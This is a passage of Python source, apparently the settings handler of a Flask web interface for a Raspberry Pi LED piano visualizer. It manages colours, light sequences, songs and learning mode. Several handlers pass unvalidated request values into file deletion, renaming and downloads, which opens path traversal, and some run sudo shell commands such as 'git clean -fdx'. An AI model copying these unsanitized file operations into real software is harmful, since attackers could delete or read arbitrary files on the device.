reload_sequence=reload_sequence)\n\n if setting_name == \"remove_all_multicolors\":\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n return jsonify(success=True)\n\n if setting_name == \"rainbow_offset\":\n webinterface.ledsettings.rainbow_offset = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_offset\",\n int(webinterface.ledsettings.rainbow_offset))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_scale\":\n webinterface.ledsettings.rainbow_scale = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_scale\",\n int(webinterface.ledsettings.rainbow_scale))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_timeshift\":\n webinterface.ledsettings.rainbow_timeshift = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_timeshift\",\n int(webinterface.ledsettings.rainbow_timeshift))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_slowest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_slowest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_slowest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_slowest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_slowest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_slowest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_slowest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_fastest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_fastest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_fastest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_fastest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_fastest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_fastest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_fastest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_start_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_start[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_start[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_start[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_start_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_start_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_start_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_end_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_end[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_end[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_end[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_end_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_end_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_end_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_max_notes\":\n webinterface.ledsettings.speed_max_notes = int(value)\n webinterface.usersettings.change_setting_value(\"speed_max_notes\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_period_in_seconds\":\n webinterface.ledsettings.speed_period_in_seconds = float(value)\n webinterface.usersettings.change_setting_value(\"speed_period_in_seconds\", float(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_not_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_not_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_not_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_not_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"scale_key\":\n webinterface.ledsettings.scale_key = int(value)\n webinterface.usersettings.change_setting_value(\"scale_key\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"next_step\":\n webinterface.ledsettings.set_sequence(0, 1, False)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"set_sequence\":\n if (int(value) == 0):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n else:\n webinterface.ledsettings.set_sequence(int(value) - 1, 0)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_sequence_name\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"sequence_name\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_value\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"next_step\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_activation_method\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"control_number\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n sequences_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(sequences_amount))) == 0):\n break\n sequences_amount += 1\n\n settings = sequences_tree.createElement(\"settings\")\n\n control_number = sequences_tree.createElement(\"control_number\")\n control_number.appendChild(sequences_tree.createTextNode(\"0\"))\n settings.appendChild(control_number)\n\n next_step = sequences_tree.createElement(\"next_step\")\n next_step.appendChild(sequences_tree.createTextNode(\"1\"))\n settings.appendChild(next_step)\n\n sequence_name = sequences_tree.createElement(\"sequence_name\")\n sequence_name.appendChild(sequences_tree.createTextNode(\"Sequence \" + str(sequences_amount)))\n settings.appendChild(sequence_name)\n\n step = sequences_tree.createElement(\"step_1\")\n\n color = sequences_tree.createElement(\"color\")\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n element = sequences_tree.createElement(\"sequence_\" + str(sequences_amount))\n element.appendChild(settings)\n element.appendChild(step)\n\n sequences_tree.getElementsByTagName(\"list\")[0].appendChild(element)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing sequence node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for sequence in sequences_tree.getElementsByTagName(\"list\")[0].childNodes:\n if (sequence.nodeType == 1):\n sequences_tree.getElementsByTagName(sequence.nodeName)[0].tagName = \"sequence_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_step\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n step_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(step_amount))) == 0):\n break\n step_amount += 1\n\n step = sequences_tree.createElement(\"step_\" + str(step_amount))\n\n color = sequences_tree.createElement(\"color\")\n\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n # remove node list with a tag name \"step_\" + str(value), and change tag names to maintain order\n if setting_name == \"remove_step\":\n\n second_value = int(second_value)\n second_value += 1\n\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing step node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for step in sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].childNodes:\n if (step.nodeType == 1 and step.tagName != \"settings\"):\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(step.nodeName)[\n 0].tagName = \"step_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n # saving current led settings as sequence step\n if setting_name == \"save_led_settings_to_step\" and second_value != \"\":\n\n # remove node and child under \"sequence_\" + str(value) and \"step_\" + str(second_value)\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n second_value = int(second_value)\n second_value += 1\n\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # create new step node\n step = sequences_tree.createElement(\"step_\" + str(second_value))\n\n # load color mode from webinterface.ledsettings and put it into step node\n color_mode = sequences_tree.createElement(\"color\")\n color_mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.color_mode)))\n step.appendChild(color_mode)\n\n # load mode from webinterface.ledsettings and put it into step node\n mode = sequences_tree.createElement(\"light_mode\")\n mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.mode)))\n step.appendChild(mode)\n\n # if mode is equal \"Fading\" or \"Velocity\" load mode from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.mode == \"Fading\" or webinterface.ledsettings.mode == \"Velocity\"):\n fadingspeed = sequences_tree.createElement(\"fadingspeed\")\n\n # depending on fadingspeed name set different fadingspeed value\n if (webinterface.ledsettings.fadingspeed == \"Slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"10\"))\n elif (webinterface.ledsettings.fadingspeed == \"Medium\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"20\"))\n elif (webinterface.ledsettings.fadingspeed == \"Fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"40\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"50\"))\n elif (webinterface.ledsettings.fadingspeed == \"Instant\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"1000\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"2\"))\n\n step.appendChild(fadingspeed)\n\n # if color_mode is equal to \"Single\" load color from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Single\"):\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.red)))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.green)))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.blue)))\n step.appendChild(blue)\n\n # if color_mode is equal to \"Multicolor\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Multicolor\"):\n # load value from webinterface.ledsettings.multicolor\n multicolor = webinterface.ledsettings.multicolor\n\n # loop through multicolor object and add each color to step node under \"sequence_\"+str(value) with tag name \"color_\"+str(i)\n for i in range(len(multicolor)):\n color = sequences_tree.createElement(\"color_\" + str(i + 1))\n new_multicolor = str(multicolor[i])\n new_multicolor = new_multicolor.replace(\"[\", \"\")\n new_multicolor = new_multicolor.replace(\"]\", \"\")\n\n color.appendChild(sequences_tree.createTextNode(new_multicolor))\n step.appendChild(color)\n\n # same as above but with multicolor_range and \"color_range_\"+str(i)\n multicolor_range = webinterface.ledsettings.multicolor_range\n for i in range(len(multicolor_range)):\n color_range = sequences_tree.createElement(\"color_range_\" + str(i + 1))\n new_multicolor_range = str(multicolor_range[i])\n\n new_multicolor_range = new_multicolor_range.replace(\"[\", \"\")\n new_multicolor_range = new_multicolor_range.replace(\"]\", \"\")\n color_range.appendChild(sequences_tree.createTextNode(new_multicolor_range))\n step.appendChild(color_range)\n\n # if color_mode is equal to \"Rainbow\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Rainbow\"):\n # load values rainbow_offset, rainbow_scale and rainbow_timeshift from webinterface.ledsettings and put them into step node under Offset, Scale and Timeshift\n rainbow_offset = sequences_tree.createElement(\"Offset\")\n rainbow_offset.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_offset)))\n step.appendChild(rainbow_offset)\n\n rainbow_scale = sequences_tree.createElement(\"Scale\")\n rainbow_scale.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_scale)))\n step.appendChild(rainbow_scale)\n\n rainbow_timeshift = sequences_tree.createElement(\"Timeshift\")\n rainbow_timeshift.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_timeshift)))\n step.appendChild(rainbow_timeshift)\n\n # if color_mode is equal to \"Speed\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Speed\"):\n # load values speed_slowest[\"red\"] etc from webinterface.ledsettings and put them under speed_slowest_red etc\n speed_slowest_red = sequences_tree.createElement(\"speed_slowest_red\")\n speed_slowest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"red\"])))\n step.appendChild(speed_slowest_red)\n\n speed_slowest_green = sequences_tree.createElement(\"speed_slowest_green\")\n speed_slowest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"green\"])))\n step.appendChild(speed_slowest_green)\n\n speed_slowest_blue = sequences_tree.createElement(\"speed_slowest_blue\")\n speed_slowest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"blue\"])))\n step.appendChild(speed_slowest_blue)\n\n # same as above but with \"fastest\"\n speed_fastest_red = sequences_tree.createElement(\"speed_fastest_red\")\n speed_fastest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"red\"])))\n step.appendChild(speed_fastest_red)\n\n speed_fastest_green = sequences_tree.createElement(\"speed_fastest_green\")\n speed_fastest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"green\"])))\n step.appendChild(speed_fastest_green)\n\n speed_fastest_blue = sequences_tree.createElement(\"speed_fastest_blue\")\n speed_fastest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"blue\"])))\n step.appendChild(speed_fastest_blue)\n\n # load \"speed_max_notes\" and \"speed_period_in_seconds\" values from webinterface.ledsettings\n # and put them under speed_max_notes and speed_period_in_seconds\n\n speed_max_notes = sequences_tree.createElement(\"speed_max_notes\")\n speed_max_notes.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.speed_max_notes)))\n step.appendChild(speed_max_notes)\n\n speed_period_in_seconds = sequences_tree.createElement(\"speed_period_in_seconds\")\n speed_period_in_seconds.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_period_in_seconds)))\n step.appendChild(speed_period_in_seconds)\n\n # if color_mode is equal to \"Gradient\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Gradient\"):\n # load values gradient_start_red etc from webinterface.ledsettings and put them under gradient_start_red etc\n gradient_start_red = sequences_tree.createElement(\"gradient_start_red\")\n gradient_start_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"red\"])))\n step.appendChild(gradient_start_red)\n\n gradient_start_green = sequences_tree.createElement(\"gradient_start_green\")\n gradient_start_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"green\"])))\n step.appendChild(gradient_start_green)\n\n gradient_start_blue = sequences_tree.createElement(\"gradient_start_blue\")\n gradient_start_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"blue\"])))\n step.appendChild(gradient_start_blue)\n\n # same as above but with gradient_end\n gradient_end_red = sequences_tree.createElement(\"gradient_end_red\")\n gradient_end_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"red\"])))\n step.appendChild(gradient_end_red)\n\n gradient_end_green = sequences_tree.createElement(\"gradient_end_green\")\n gradient_end_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"green\"])))\n step.appendChild(gradient_end_green)\n\n gradient_end_blue = sequences_tree.createElement(\"gradient_end_blue\")\n gradient_end_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"blue\"])))\n step.appendChild(gradient_end_blue)\n\n # if color_mode is equal to \"Scale\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Scale\"):\n # load values key_in_scale_red etc from webinterface.ledsettings and put them under key_in_scale_red etc\n key_in_scale_red = sequences_tree.createElement(\"key_in_scale_red\")\n key_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"red\"])))\n step.appendChild(key_in_scale_red)\n\n key_in_scale_green = sequences_tree.createElement(\"key_in_scale_green\")\n key_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"green\"])))\n step.appendChild(key_in_scale_green)\n\n key_in_scale_blue = sequences_tree.createElement(\"key_in_scale_blue\")\n key_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"blue\"])))\n step.appendChild(key_in_scale_blue)\n\n # same as above but with key_not_in_scale\n key_not_in_scale_red = sequences_tree.createElement(\"key_not_in_scale_red\")\n key_not_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"red\"])))\n step.appendChild(key_not_in_scale_red)\n\n key_not_in_scale_green = sequences_tree.createElement(\"key_not_in_scale_green\")\n key_not_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"green\"])))\n step.appendChild(key_not_in_scale_green)\n\n key_not_in_scale_blue = sequences_tree.createElement(\"key_not_in_scale_blue\")\n key_not_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"blue\"])))\n step.appendChild(key_not_in_scale_blue)\n\n try:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].insertBefore(step,\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].getElementsByTagName(\"step_\" + str(second_value + 1))[0])\n except:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n if setting_name == \"screen_on\":\n if (int(value) == 0):\n webinterface.menu.disable_screen()\n else:\n webinterface.menu.enable_screen()\n\n if setting_name == \"reset_to_default\":\n webinterface.usersettings.reset_to_default()\n\n if setting_name == \"restart_rpi\":\n call(\"sudo /sbin/reboot now\", shell=True)\n\n if setting_name == \"turnoff_rpi\":\n call(\"sudo /sbin/shutdown -h now\", shell=True)\n\n if setting_name == \"update_rpi\":\n call(\"sudo git reset --hard HEAD\", shell=True)\n call(\"sudo git checkout .\", shell=True)\n call(\"sudo git clean -fdx\", shell=True)\n call(\"sudo git pull origin master\", shell=True)\n\n if setting_name == \"connect_ports\":\n webinterface.midiports.connectall()\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"disconnect_ports\":\n call(\"sudo aconnect -x\", shell=True)\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"restart_rtp\":\n call(\"sudo systemctl restart rtpmidid\", shell=True)\n\n if setting_name == \"start_recording\":\n webinterface.saving.start_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"cancel_recording\":\n webinterface.saving.cancel_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"save_recording\":\n now = datetime.datetime.now()\n current_date = now.strftime(\"%Y-%m-%d %H:%M\")\n webinterface.saving.save(current_date)\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"change_song_name\":\n if os.path.exists(\"Songs/\" + second_value):\n return jsonify(success=False, reload_songs=True, error=second_value + \" already exists\")\n\n if \"_main\" in value:\n search_name = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if search_name in fname:\n new_name = second_value.replace(\".mid\", \"\") + fname.replace(search_name, \"\")\n os.rename('Songs/' + fname, 'Songs/' + new_name)\n else:\n os.rename('Songs/' + value, 'Songs/' + second_value)\n os.rename('Songs/cache/' + value + \".p\", 'Songs/cache/' + second_value + \".p\")\n\n\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"remove_song\":\n if \"_main\" in value:\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname:\n os.remove(\"Songs/\" + fname)\n else:\n os.remove(\"Songs/\" + value)\n\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n for file_type in file_types:\n try:\n os.remove(\"Songs/\" + value.replace(\".mid\", file_type))\n except:\n pass\n\n try:\n os.remove(\"Songs/cache/\" + value + \".p\")\n except:\n print(\"No cache file for \" + value)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"download_song\":\n if \"_main\" in value:\n zipObj = ZipFile(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\", 'w')\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n songs_count = 0\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname and \".zip\" not in fname:\n songs_count += 1\n zipObj.write(\"Songs/\" + fname)\n zipObj.close()\n if songs_count == 1:\n os.remove(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\")\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", as_attachment=True)\n else:\n return send_file(safe_join(\"../Songs/\" + value), mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n\n if setting_name == \"download_sheet_music\":\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n i = 0\n while i < len(file_types):\n try:\n new_name = value.replace(\".mid\", file_types[i])\n return send_file(\"../Songs/\" + new_name, mimetype='application/x-csv', attachment_filename=new_name,\n as_attachment=True)\n except:\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n return send_file(safe_join(\"../Songs/\", value.replace(\".mid\", \".abc\")), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n\n if setting_name == \"start_midi_play\":\n webinterface.saving.t = threading.Thread(target=play_midi, args=(value, webinterface.midiports,\n webinterface.saving, webinterface.menu,\n webinterface.ledsettings,\n webinterface.ledstrip))\n webinterface.saving.t.start()\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"stop_midi_play\":\n webinterface.saving.is_playing_midi.clear()\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"learning_load_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.load_midi, args=(value,))\n webinterface.learning.t.start()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"start_learning_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.learn_midi)\n webinterface.learning.t.start()\n\n return jsonify(success=True)\n\n if setting_name == \"stop_learning_song\":\n webinterface.learning.is_started_midi = False\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True)\n\n if setting_name == \"change_practice\":\n value = int(value)\n webinterface.learning.practice = value\n webinterface.learning.practice = clamp(webinterface.learning.practice, 0, len(webinterface.learning.practiceList) - 1)\n webinterface.usersettings.change_setting_value(\"practice\", webinterface.learning.practice)\n\n return jsonify(success=True)\n\n if setting_name == \"change_tempo\":\n value = int(value)\n webinterface.learning.set_tempo = value\n webinterface.learning.set_tempo = clamp(webinterface.learning.set_tempo, 10, 200)\n webinterface.usersettings.change_setting_value(\"set_tempo\", webinterface.learning.set_tempo)\n\n return jsonify(success=True)\n\n if setting_name == \"change_hands\":\n value = int(value)\n webinterface.learning.hands = value\n webinterface.learning.hands = clamp(webinterface.learning.hands, 0, len(webinterface.learning.handsList) - 1)\n webinterface.usersettings.change_setting_value(\"hands\", webinterface.learning.hands)\n\n return jsonify(success=True)\n\n if setting_name == \"change_mute_hand\":\n value = int(value)\n webinterface.learning.mute_hand = value\n webinterface.learning.mute_hand = clamp(webinterface.learning.mute_hand, 0, len(webinterface.learning.mute_handList) - 1)\n webinterface.usersettings.change_setting_value(\"mute_hand\", webinterface.learning.mute_hand)\n\n return jsonify(success=True)\n\n if setting_name == \"learning_start_point\":\n value = int(value)\n webinterface.learning.start_point = value\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"learning_end_point\":\n value = int(value)\n webinterface.learning.end_point = value\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"set_current_time_as_start_point\":\n webinterface.learning.start_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"set_current_time_as_end_point\":\n webinterface.learning.end_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handL_color\":\n value = int(value)\n webinterface.learning.hand_colorL += value\n webinterface.learning.hand_colorL = clamp(webinterface.learning.hand_colorL, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorL\", webinterface.learning.hand_colorL)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == 